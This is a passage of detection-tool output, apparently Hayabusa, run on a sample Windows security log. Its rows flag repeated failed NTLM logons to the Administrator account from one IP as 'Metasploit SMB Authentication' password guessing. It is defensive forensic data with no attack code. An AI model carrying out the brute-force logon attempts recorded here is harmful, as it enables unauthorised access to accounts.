Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tWdm76C4nL6tkU0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u2WEqTrg3A760Axt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyqhXspTlWwVCwA3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rkidbQJmvQr35Jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zr92VsL1YgHVehnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQP1K9rHrOyL0TOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LR783q3o34oLQLTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6NCTNhcghRGWf1qi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CVJdStLdKDbUICyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luAoVhEj1rOgZBfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OrqmovxoEEjLCaYV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AIP4mDSVhM27IAIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cym5lXDK01XuJz2b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7pYXA1Ic6BOfG31o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b722QrTSVoZGfiK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NzRFz4L7dpar794B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pLWuw9eMN9rqm0Ic : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sE7pzfiKRfOb2dH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxL1cV8OiFVRfj4I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHs8Z8XPLg58jZ1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6kRLlJt3Oxwhdgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s4kTwriHAKVsTqzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jfitpZ5ZrzBfpNf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdcU6ypEEeIAugGI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jIMfGIU1pHasO88g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHsxKEQK7CWSqprp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QkC70klP6mv8YZrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3YM3zaZk64qqq7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mOLbk23zOqQLZYZU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0tlyXqvCQJVqaB5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: npjQlHcGls5gENng : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7buinUqketmW3Ib6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rs5gYGs6JBf2yV1J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67hYMvtmbrmv5LHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtV42zBnWwRCLfJS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jnaPNm28FvbFfM8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCEvKO14gPFHAZIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iJJyXCm1YOI2uIAS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MNAScx4qMKxCJQdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKTHsNA29ZnPHCHQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CjvAb3sjN0PM8my4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wYQ6HuRSMh8DXzMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZgejUxgojDE1kR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2L4yO411OUnkRGWQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O3mGCNGFML75P7w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6CBslPz31UACz0wR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4Y8V0wB6unpmFXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 